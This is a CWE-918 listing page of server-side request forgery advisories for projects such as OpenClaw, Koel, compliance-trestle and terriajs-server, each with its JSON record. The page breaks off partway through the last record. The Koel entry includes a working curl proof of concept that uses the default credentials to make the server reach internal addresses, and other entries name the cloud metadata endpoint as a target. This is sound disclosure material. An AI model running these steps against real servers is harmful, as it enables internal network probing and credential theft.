CWE-918
AllowedServer-Side Request Forgery (SSRF)
Abstraction: Base · Status: Incomplete
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
4606 vulnerabilities reference this CWE, most recent first.
GHSA-W76H-8M22-HPGH
Vulnerability from github – Published: 2026-03-03 18:10 – Updated: 2026-03-20 21:14Summary
In OpenClaw MSTeams media download flows, redirect handling could bypass configured mediaAllowHosts checks in specific attachment paths. Redirect chains were not consistently constrained to allowlisted targets before accepting fetched content.
Affected Packages / Versions
- Package:
openclaw(npm) - Affected versions:
<= 2026.2.21-2(latest published at triage time) - Fixed in:
2026.2.22(planned next release)
Impact
Attackers able to supply or influence attachment URLs could force redirect chains to non-allowlisted targets, weakening SSRF boundary controls for MSTeams media ingestion.
Fix Commit(s)
73d93dee64127a26f1acd09d0403b794cdeb4f5cb34097f62df9d1960cc22600269cd3f3284e2124
Release Process Note
patched_versions is pre-set to the planned next release (2026.2.22). Once that npm release is published, this advisory can be published without further version-field edits.
OpenClaw thanks @tdjackey for reporting.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "openclaw"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2026.2.22"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32037"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-03T18:10:12Z",
"nvd_published_at": "2026-03-19T22:16:39Z",
"severity": "HIGH"
},
"details": "## Summary\nIn OpenClaw MSTeams media download flows, redirect handling could bypass configured `mediaAllowHosts` checks in specific attachment paths. Redirect chains were not consistently constrained to allowlisted targets before accepting fetched content.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `\u003c= 2026.2.21-2` (latest published at triage time)\n- Fixed in: `2026.2.22` (planned next release)\n\n## Impact\nAttackers able to supply or influence attachment URLs could force redirect chains to non-allowlisted targets, weakening SSRF boundary controls for MSTeams media ingestion.\n\n## Fix Commit(s)\n- `73d93dee64127a26f1acd09d0403b794cdeb4f5c`\n- `b34097f62df9d1960cc22600269cd3f3284e2124`\n\n## Release Process Note\n`patched_versions` is pre-set to the planned next release (`2026.2.22`). Once that npm release is published, this advisory can be published without further version-field edits.\n\nOpenClaw thanks @tdjackey for reporting.",
"id": "GHSA-w76h-8m22-hpgh",
"modified": "2026-03-20T21:14:20Z",
"published": "2026-03-03T18:10:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w76h-8m22-hpgh"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32037"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/73d93dee64127a26f1acd09d0403b794cdeb4f5c"
},
{
"type": "WEB",
"url": "https://github.com/openclaw/openclaw/commit/b34097f62df9d1960cc22600269cd3f3284e2124"
},
{
"type": "PACKAGE",
"url": "https://github.com/openclaw/openclaw"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/openclaw-redirect-chain-bypass-of-media-host-allowlist-in-msteams-attachment-handling"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenClaw\u0027s MSTeams attachment redirect handling could bypass configured media host allowlists"
}
GHSA-W76H-Q7C6-JPJP
Vulnerability from github – Published: 2026-05-28 18:27 – Updated: 2026-05-28 18:27A source code audit led to the discovery of three significant security vulnerabilities in the trestle/core/remote/cache.py module.
Finding 1 (Critical): SSRF (CWE-918) The HTTPSFetcher._do_fetch() method passes a user-supplied URL directly to requests.get() without validation. This allows an attacker to perform Server-Side Request Forgery, targeting internal services or cloud metadata endpoints (e.g., 169.254.169.254).
Per rule 4.2.11 of the CVE CNA rules Finding 1 will be addressed in this advisory, while findings 2 & 3 will be addressed in separate advisories:
Multiple Path Traversal Vulnerabilities in Remote Fetching Subsystem
Finding 2 & 3 (High/Medium): Path Traversal (CWE-22) The caching logic for HTTPSFetcher and LocalFetcher fails to sanitize URI paths, allowing for arbitrary file reads via file:// or writing cached files outside the intended directory.
Impact: > These vulnerabilities can be chained to exfiltrate sensitive cloud credentials or compromise CI/CD environments.
Reproduction: > Please see the attached poc_ssrf_and_path_traversal.py and terminal_output.txt. 13 exploit vectors have been verified locally.
compliance-trestle_audit_2026-03-30.pdf poc_ssrf_and_path_traversal.py terminal_output.txt
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "compliance-trestle"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.0.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "compliance-trestle"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.12.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46380"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-28T18:27:13Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "A source code audit led to the discovery of three significant security vulnerabilities in the trestle/core/remote/cache.py module.\n\n**Finding 1 (Critical): SSRF (CWE-918)**\nThe HTTPSFetcher._do_fetch() method passes a user-supplied URL directly to requests.get() without validation. This allows an attacker to perform Server-Side Request Forgery, targeting internal services or cloud metadata endpoints (e.g., 169.254.169.254).\n\nPer [rule 4.2.11 of the CVE CNA rules](https://www.cve.org/ResourcesSupport/AllResources/CNARules#section_4-2_CVE_ID_Assignment) Finding 1 will be addressed in this advisory, while findings 2 \u0026 3 will be addressed in separate advisories:\n\n---\n\nMultiple Path Traversal Vulnerabilities in Remote Fetching Subsystem\n\n**Finding 2 \u0026 3 (High/Medium): Path Traversal (CWE-22)**\nThe caching logic for HTTPSFetcher and LocalFetcher fails to sanitize URI paths, allowing for arbitrary file reads via file:// or writing cached files outside the intended directory.\n\nImpact: \u003e These vulnerabilities can be chained to exfiltrate sensitive cloud credentials or compromise CI/CD environments.\n\nReproduction: \u003e Please see the attached poc_ssrf_and_path_traversal.py and terminal_output.txt. 13 exploit vectors have been verified locally.\n\n[compliance-trestle_audit_2026-03-30.pdf](https://github.com/user-attachments/files/26348930/compliance-trestle_audit_2026-03-30.pdf)\n[poc_ssrf_and_path_traversal.py](https://github.com/user-attachments/files/26348820/poc_ssrf_and_path_traversal.py)\n[terminal_output.txt](https://github.com/user-attachments/files/26348821/terminal_output.txt)",
"id": "GHSA-w76h-q7c6-jpjp",
"modified": "2026-05-28T18:27:13Z",
"published": "2026-05-28T18:27:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/oscal-compass/compliance-trestle/security/advisories/GHSA-w76h-q7c6-jpjp"
},
{
"type": "WEB",
"url": "https://github.com/oscal-compass/compliance-trestle/commit/53de5e75332888ea54f5da41d4c7859bb1d608e1"
},
{
"type": "WEB",
"url": "https://github.com/oscal-compass/compliance-trestle/commit/5c65c5926fe7ca908b9c1d281f904e7d97ba8310"
},
{
"type": "PACKAGE",
"url": "https://github.com/oscal-compass/compliance-trestle"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "compliance-trestle Vulnerable to SSRF in Remote Fetching Subsystem"
}
GHSA-W789-49FC-V8HR
Vulnerability from github – Published: 2026-02-26 15:22 – Updated: 2026-02-26 15:22Impact
A validation bug allows an attacker to proxy domains not explicitly allowed in the proxyableDomains configuration.
The validation only checks if a hostname ended with an allowed domain. This meant:
If example.com is allowed in proxyableDomains:
- ✅ example.com is allowed (correct)
- ✅ api.example.com is allowed (correct)
- ⚠️ maliciousexample.com is allowed (incorrect)
An attacker could register maliciousexample.com and proxy content through terriajs-server, bypassing proxy restrictions.
Patches
All versions up to 4.0.2 are affected. Upgrade to 4.0.3 to address the vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "terriajs-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27818"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-26T15:22:11Z",
"nvd_published_at": "2026-02-26T00:16:26Z",
"severity": "HIGH"
},
"details": "### Impact\nA validation bug allows an attacker to proxy domains not explicitly allowed in the `proxyableDomains` configuration.\n\nThe validation only checks if a hostname _ended_ with an allowed domain. This meant:\n\nIf `example.com` is allowed in `proxyableDomains`:\n\n- \u2705 example.com is allowed (correct)\n- \u2705 api.example.com is allowed (correct)\n- \u26a0\ufe0f maliciousexample.com is allowed (incorrect)\n\nAn attacker could register maliciousexample.com and proxy content through `terriajs-server`, bypassing proxy restrictions.\n\n### Patches\nAll versions up to 4.0.2 are affected. Upgrade to 4.0.3 to address the vulnerability.",
"id": "GHSA-w789-49fc-v8hr",
"modified": "2026-02-26T15:22:11Z",
"published": "2026-02-26T15:22:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/TerriaJS/terriajs-server/security/advisories/GHSA-w789-49fc-v8hr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27818"
},
{
"type": "WEB",
"url": "https://github.com/TerriaJS/terriajs-server/commit/3aaa5d9717162b245ae4569232bbe7d8673c913f"
},
{
"type": "PACKAGE",
"url": "https://github.com/TerriaJS/terriajs-server"
},
{
"type": "WEB",
"url": "https://github.com/TerriaJS/terriajs-server/releases/tag/4.0.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "TerriaJS-Server has a domain validation bypass vulnerability in its proxy allowlist"
}
GHSA-W79M-F3JX-779V
Vulnerability from github – Published: 2026-07-15 17:07 – Updated: 2026-07-15 17:07Summary
Koel v9.6.0 protects the regular podcast subscription API with SafeUrl, but the Subsonic-compatible createPodcastChannel.view route does not apply the same protection. An authenticated user can supply a private URL and cause Koel to fetch it server-side during podcast parsing.
This was validated against v9.6.0 (352ea5ec27fa22294da8fb6beacb3d5552f0d09c) using the official phanan/koel:9.6.0 image.
This is distinct from GHSA-7j2f-6h2r-6cqc, which fixed unsafe episode enclosure URLs in versions <= 9.3.4. The issue here is a newer validation gap in the Subsonic route itself, still present in v9.6.0.
Details
SafeUrl protects the regular podcast API only
The regular podcast subscription path validates the feed URL with SafeUrl:
app/Http/Requests/API/Podcast/PodcastStoreRequest.php
return [
'url' => ['required', 'url', new SafeUrl()],
];
The Subsonic-compatible route does not:
routes/subsonic.phpcreatePodcastChannel.viewapp/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
return [
'url' => ['required', 'string', 'url'],
];
That creates the same kind of trust-boundary mismatch as the radio issue: the main API rejects private targets, while the compatibility route accepts them.
The URL is fetched immediately by the podcast parser
The attacker-controlled URL is used by the podcast service during channel creation:
app/Http/Controllers/Subsonic/CreatePodcastChannelController.phpapp/Services/Podcast/PodcastService.php
PodcastService::addPodcast() calls:
$parser = $this->createParser($url);
and createParser() resolves to:
return Poddle::fromUrl($url, 5 * 60, $this->client);
This means the SSRF happens as part of the channel creation flow itself. No separate playback step is needed.
This bypasses Koel's intended SSRF control for podcast URLs
Koel already added SafeUrl to the regular podcast API and has already published a podcast-related SSRF advisory. The Subsonic route does not reuse that same control, so it reintroduces a server-side fetch primitive for private destinations.
PoC
The following steps were validated against the official phanan/koel:9.6.0 image.
- Authenticate and obtain an API token:
API_TOKEN=$(
curl -sS -X POST http://127.0.0.1:18081/api/me \
-H 'Content-Type: application/json' \
--data '{"email":"admin@koel.dev","password":"KoelIsCool"}' \
| python3 -c 'import json,sys; print(json.load(sys.stdin)["token"])'
)
- Obtain the user's Subsonic API key:
SUBSONIC_KEY=$(
curl -sS http://127.0.0.1:18081/api/data \
-H "Authorization: Bearer $API_TOKEN" \
| python3 -c 'import json,sys; print(json.load(sys.stdin)["current_user"]["subsonic_api_key"])'
)
- Prepare an internal-only target URL. In my validation, I used a host-side RSS fixture reachable from the container through the Docker bridge:
TARGET_URL="http://172.17.0.1:18090/feed.xml?run=1"
- Confirm the regular web API blocks the URL:
curl -i -X POST http://127.0.0.1:18081/api/podcasts \
-H "Authorization: Bearer $API_TOKEN" \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
--data "{\"url\":\"$TARGET_URL\"}"
Expected result:
- HTTP
422 -
Error includes
The url must point to a public URL. -
Trigger the Subsonic route with the same URL:
curl -i -G http://127.0.0.1:18081/rest/createPodcastChannel.view \
--data-urlencode "apiKey=$SUBSONIC_KEY" \
--data-urlencode 'f=json' \
--data-urlencode "url=$TARGET_URL"
Expected result:
- HTTP
200 -
JSON includes
"status":"ok" -
Confirm the server-side request happened by checking the internal HTTP service logs.
During validation, the local HTTP test server received HEAD and GET requests for /feed.xml?run=1.
Impact
An authenticated user can make Koel send server-side HTTP requests to internal destinations that are intentionally blocked by the main web API.
Validated impact: - SSRF to loopback, Docker-bridge, and RFC1918 HTTP destinations reachable from the Koel server - Internal service discovery and request execution through the podcast parser
Generic response-body exfiltration was not validated through this exact route. The confirmed impact is SSRF-based internal request execution.
Remediation
The Subsonic podcast request validator should apply SafeUrl, and the parser entry point should reject unsafe targets as defense in depth.
Suggested patch for app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php:
diff --git a/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php b/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
--- a/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
+++ b/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php
@@
namespace App\Http\Requests\Subsonic;
use App\Http\Requests\Request;
+use App\Rules\SafeUrl;
@@
public function rules(): array
{
return [
- 'url' => ['required', 'string', 'url'],
+ 'url' => ['required', 'string', 'url', new SafeUrl()],
];
}
}
Suggested defense-in-depth patch for app/Services/Podcast/PodcastService.php:
diff --git a/app/Services/Podcast/PodcastService.php b/app/Services/Podcast/PodcastService.php
--- a/app/Services/Podcast/PodcastService.php
+++ b/app/Services/Podcast/PodcastService.php
@@
private function createParser(string $url): Poddle
{
+ if (!$this->network->isSafeUrl($url)) {
+ throw FailedToParsePodcastFeedException::create($url);
+ }
+
return Poddle::fromUrl($url, 5 * 60, $this->client);
}
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 9.6.0"
},
"package": {
"ecosystem": "Packagist",
"name": "phanan/koel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "9.7.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54492"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-15T17:07:16Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nKoel `v9.6.0` protects the regular podcast subscription API with `SafeUrl`, but the Subsonic-compatible `createPodcastChannel.view` route does not apply the same protection. An authenticated user can supply a private URL and cause Koel to fetch it server-side during podcast parsing.\n\nThis was validated against `v9.6.0` (`352ea5ec27fa22294da8fb6beacb3d5552f0d09c`) using the official `phanan/koel:9.6.0` image.\n\nThis is distinct from `GHSA-7j2f-6h2r-6cqc`, which fixed unsafe episode enclosure URLs in versions `\u003c= 9.3.4`. The issue here is a newer validation gap in the Subsonic route itself, still present in `v9.6.0`.\n\n### Details\n#### SafeUrl protects the regular podcast API only\n\nThe regular podcast subscription path validates the feed URL with `SafeUrl`:\n\n- `app/Http/Requests/API/Podcast/PodcastStoreRequest.php`\n\n```php\nreturn [\n \u0027url\u0027 =\u003e [\u0027required\u0027, \u0027url\u0027, new SafeUrl()],\n];\n```\n\nThe Subsonic-compatible route does not:\n\n- `routes/subsonic.php`\n - `createPodcastChannel.view`\n- `app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php`\n\n```php\nreturn [\n \u0027url\u0027 =\u003e [\u0027required\u0027, \u0027string\u0027, \u0027url\u0027],\n];\n```\n\nThat creates the same kind of trust-boundary mismatch as the radio issue: the main API rejects private targets, while the compatibility route accepts them.\n\n#### The URL is fetched immediately by the podcast parser\n\nThe attacker-controlled URL is used by the podcast service during channel creation:\n\n- `app/Http/Controllers/Subsonic/CreatePodcastChannelController.php`\n- `app/Services/Podcast/PodcastService.php`\n\n`PodcastService::addPodcast()` calls:\n\n```php\n$parser = $this-\u003ecreateParser($url);\n```\n\nand `createParser()` resolves to:\n\n```php\nreturn Poddle::fromUrl($url, 5 * 60, $this-\u003eclient);\n```\n\nThis means the SSRF happens as part of the channel creation flow itself. No separate playback step is needed.\n\n#### This bypasses Koel\u0027s intended SSRF control for podcast URLs\n\nKoel already added `SafeUrl` to the regular podcast API and has already published a podcast-related SSRF advisory. The Subsonic route does not reuse that same control, so it reintroduces a server-side fetch primitive for private destinations.\n\n### PoC\nThe following steps were validated against the official `phanan/koel:9.6.0` image.\n\n1. Authenticate and obtain an API token:\n\n```bash\nAPI_TOKEN=$(\n curl -sS -X POST http://127.0.0.1:18081/api/me \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"email\":\"admin@koel.dev\",\"password\":\"KoelIsCool\"}\u0027 \\\n | python3 -c \u0027import json,sys; print(json.load(sys.stdin)[\"token\"])\u0027\n)\n```\n\n2. Obtain the user\u0027s Subsonic API key:\n\n```bash\nSUBSONIC_KEY=$(\n curl -sS http://127.0.0.1:18081/api/data \\\n -H \"Authorization: Bearer $API_TOKEN\" \\\n | python3 -c \u0027import json,sys; print(json.load(sys.stdin)[\"current_user\"][\"subsonic_api_key\"])\u0027\n)\n```\n\n3. Prepare an internal-only target URL. In my validation, I used a host-side RSS fixture reachable from the container through the Docker bridge:\n\n```bash\nTARGET_URL=\"http://172.17.0.1:18090/feed.xml?run=1\"\n```\n\n4. Confirm the regular web API blocks the URL:\n\n```bash\ncurl -i -X POST http://127.0.0.1:18081/api/podcasts \\\n -H \"Authorization: Bearer $API_TOKEN\" \\\n -H \u0027Accept: application/json\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \"{\\\"url\\\":\\\"$TARGET_URL\\\"}\"\n```\n\nExpected result:\n\n- HTTP `422`\n- Error includes `The url must point to a public URL.`\n\n5. Trigger the Subsonic route with the same URL:\n\n```bash\ncurl -i -G http://127.0.0.1:18081/rest/createPodcastChannel.view \\\n --data-urlencode \"apiKey=$SUBSONIC_KEY\" \\\n --data-urlencode \u0027f=json\u0027 \\\n --data-urlencode \"url=$TARGET_URL\"\n```\n\nExpected result:\n\n- HTTP `200`\n- JSON includes `\"status\":\"ok\"`\n\n6. Confirm the server-side request happened by checking the internal HTTP service logs.\n\nDuring validation, the local HTTP test server received `HEAD` and `GET ` requests for `/feed.xml?run=1`.\n\n### Impact\nAn authenticated user can make Koel send server-side HTTP requests to internal destinations that are intentionally blocked by the main web API.\n\nValidated impact:\n- SSRF to loopback, Docker-bridge, and RFC1918 HTTP destinations reachable from the Koel server\n- Internal service discovery and request execution through the podcast parser\n\nGeneric response-body exfiltration was not validated through this exact route. The confirmed impact is SSRF-based internal request execution.\n\n### Remediation\n\nThe Subsonic podcast request validator should apply `SafeUrl`, and the parser entry point should reject unsafe targets as defense in depth.\n\nSuggested patch for `app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php`:\n\n```diff\ndiff --git a/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php b/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php\n--- a/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php\n+++ b/app/Http/Requests/Subsonic/CreatePodcastChannelRequest.php\n@@\n namespace App\\Http\\Requests\\Subsonic;\n \n use App\\Http\\Requests\\Request;\n+use App\\Rules\\SafeUrl;\n@@\n public function rules(): array\n {\n return [\n- \u0027url\u0027 =\u003e [\u0027required\u0027, \u0027string\u0027, \u0027url\u0027],\n+ \u0027url\u0027 =\u003e [\u0027required\u0027, \u0027string\u0027, \u0027url\u0027, new SafeUrl()],\n ];\n }\n }\n```\n\nSuggested defense-in-depth patch for `app/Services/Podcast/PodcastService.php`:\n\n```diff\ndiff --git a/app/Services/Podcast/PodcastService.php b/app/Services/Podcast/PodcastService.php\n--- a/app/Services/Podcast/PodcastService.php\n+++ b/app/Services/Podcast/PodcastService.php\n@@\n private function createParser(string $url): Poddle\n {\n+ if (!$this-\u003enetwork-\u003eisSafeUrl($url)) {\n+ throw FailedToParsePodcastFeedException::create($url);\n+ }\n+\n return Poddle::fromUrl($url, 5 * 60, $this-\u003eclient);\n }\n }\n```",
"id": "GHSA-w79m-f3jx-779v",
"modified": "2026-07-15T17:07:16Z",
"published": "2026-07-15T17:07:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/koel/koel/security/advisories/GHSA-w79m-f3jx-779v"
},
{
"type": "WEB",
"url": "https://github.com/koel/koel/pull/2545"
},
{
"type": "WEB",
"url": "https://github.com/koel/koel/commit/1331f335342b405e60ffabdd60f1f398508f996f"
},
{
"type": "PACKAGE",
"url": "https://github.com/koel/koel"
},
{
"type": "WEB",
"url": "https://github.com/koel/koel/releases/tag/v9.7.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Koel: Authenticated Blind SSRF via Subsonic Podcast Channel Creation"
}
GHSA-W7CR-RVWX-67Q2
Vulnerability from github – Published: 2022-05-24 17:35 – Updated: 2022-05-24 17:35AEM Forms SP6 add-on for AEM 6.5.6.0 and Forms add-on package for AEM 6.4 Service Pack 8 Cumulative Fix Pack 2 (6.4.8.2) have a blind Server-Side Request Forgery (SSRF) vulnerability. This vulnerability could be exploited by an unauthenticated attacker to gather information about internal systems that reside on the same network.
{
"affected": [],
"aliases": [
"CVE-2020-24444"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-12-10T06:15:00Z",
"severity": "MODERATE"
},
"details": "AEM Forms SP6 add-on for AEM 6.5.6.0 and Forms add-on package for AEM 6.4 Service Pack 8 Cumulative Fix Pack 2 (6.4.8.2) have a blind Server-Side Request Forgery (SSRF) vulnerability. This vulnerability could be exploited by an unauthenticated attacker to gather information about internal systems that reside on the same network.",
"id": "GHSA-w7cr-rvwx-67q2",
"modified": "2022-05-24T17:35:56Z",
"published": "2022-05-24T17:35:56Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24444"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/experience-manager/apsb20-72.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-W7JH-XMQ5-2M7V
Vulnerability from github – Published: 2026-05-06 18:30 – Updated: 2026-05-06 18:30A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device.
This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device.
{
"affected": [],
"aliases": [
"CVE-2026-20035"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-06T17:16:20Z",
"severity": "HIGH"
},
"details": "A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device.\n\nThis vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device.",
"id": "GHSA-w7jh-xmq5-2m7v",
"modified": "2026-05-06T18:30:31Z",
"published": "2026-05-06T18:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20035"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-unity-rce-ssrf-hENhuASy"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W7QP-VGWJ-6G7R
Vulnerability from github – Published: 2024-05-23 03:30 – Updated: 2026-04-08 18:33The WPCafe – Restaurant Menu, Online Ordering for WooCommerce, Pickup / Delivery and Table Reservation plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.23 via the wpc_check_for_submission function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application.
{
"affected": [],
"aliases": [
"CVE-2024-1855"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-05-23T02:15:08Z",
"severity": "MODERATE"
},
"details": "The WPCafe \u2013 Restaurant Menu, Online Ordering for WooCommerce, Pickup / Delivery and Table Reservation plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.23 via the wpc_check_for_submission function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application.",
"id": "GHSA-w7qp-vgwj-6g7r",
"modified": "2026-04-08T18:33:13Z",
"published": "2024-05-23T03:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1855"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/wp-cafe/trunk/core/action/wpc-ajax-action.php#L76"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3084054/wp-cafe/trunk/core/action/wpc-ajax-action.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5f83c19e-1b75-4fea-b4de-f7f844a449c0?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W7QX-243M-39P4
Vulnerability from github – Published: 2022-05-24 16:55 – Updated: 2024-04-04 01:54In Mendix 7.23.5 and earlier, the Excel importer module is vulnerable to SSRF, which allows attackers to craft requests from Mendix servers to any destination on the internet or a Mendix internal network, perform port scanning, and disclose lists of files located on Mendix servers.
{
"affected": [],
"aliases": [
"CVE-2019-12996"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-09-10T19:15:00Z",
"severity": "MODERATE"
},
"details": "In Mendix 7.23.5 and earlier, the Excel importer module is vulnerable to SSRF, which allows attackers to craft requests from Mendix servers to any destination on the internet or a Mendix internal network, perform port scanning, and disclose lists of files located on Mendix servers.",
"id": "GHSA-w7qx-243m-39p4",
"modified": "2024-04-04T01:54:59Z",
"published": "2022-05-24T16:55:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12996"
},
{
"type": "WEB",
"url": "https://docs.mendix.com/releasenotes/studio-pro/7.23#7236"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-W7WG-W2G9-VMJQ
Vulnerability from github – Published: 2026-07-03 06:32 – Updated: 2026-07-03 06:32The WP Import Export Lite plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to and including 3.9.30 via the wpie_import_upload_file_from_url AJAX action. The plugin's URL downloader first calls wp_safe_remote_get() (which correctly blocks private/reserved IP ranges), but when that call returns a WP_Error — the exact outcome for any blocked internal host — the Download::download_file() method falls back to GuzzleHttp\Client::request() with the original attacker-supplied URL and no SSRF protection (and with TLS verification disabled). This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services such as the cloud metadata endpoint at 169.
{
"affected": [],
"aliases": [
"CVE-2026-11397"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-03T06:16:20Z",
"severity": "MODERATE"
},
"details": "The WP Import Export Lite plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to and including 3.9.30 via the wpie_import_upload_file_from_url AJAX action. The plugin\u0027s URL downloader first calls wp_safe_remote_get() (which correctly blocks private/reserved IP ranges), but when that call returns a WP_Error \u2014 the exact outcome for any blocked internal host \u2014 the Download::download_file() method falls back to GuzzleHttp\\Client::request() with the original attacker-supplied URL and no SSRF protection (and with TLS verification disabled). This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services such as the cloud metadata endpoint at 169.",
"id": "GHSA-w7wg-w2g9-vmjq",
"modified": "2026-07-03T06:32:06Z",
"published": "2026-07-03T06:32:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11397"
},
{
"type": "WEB",
